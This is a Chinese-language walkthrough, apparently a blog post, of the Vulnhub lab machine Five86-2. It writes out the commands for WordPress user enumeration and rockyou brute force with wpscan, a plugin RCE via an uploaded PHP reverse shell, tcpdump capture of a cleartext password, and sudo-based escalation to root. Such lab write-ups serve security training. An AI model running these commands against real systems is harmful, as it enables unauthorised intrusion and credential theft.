kali:192.168.111.111
靶机:192.168.111.211
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.211
wpscan收集目标wordpress用户
wpscan --url http://five86-2/ -e u
wpscan爆破用户密码
wpscan --url http://five86-2/ -U user.txt -P /usr/share/wordlists/rockyou.txt
使用barney登录wordpress后台,发现插件Insert or Embed Articulate Content into WordPress Trial存在远程代码执行
searchsploit Insert or Embed Articulate
漏洞利用
创建一个zip压缩包里面包含一个html文件,和php反弹shell
上传后文件所在路径
之后访问php反弹shell
提权
使用之前wpscan爆破出的stephen用户的密码切换到stephen用户
使用linpease.sh收集信息,发现可以使用tcpdump
tcpdump抓取流量,获得paul用户密码:paul|esomepasswford
timeout 100 tcpdump -i br-eca3858d86bf
切换到paul用户查看sudo权限
提权方法:https://gtfobins.github.io/gtfobins/service/#sudo
sudo -u peter service ../../bin/sh
peter用户sudo权限
用命令passwd修改root用户密码
sudo -u root /usr/bin/passwd
切换到root用户
su root
获得flag
标签:Five86,sudo,用户,192.168,wpscan,Vulnhub,靶机,root,paul From: https://www.cnblogs.com/ctostm/p/17177238.html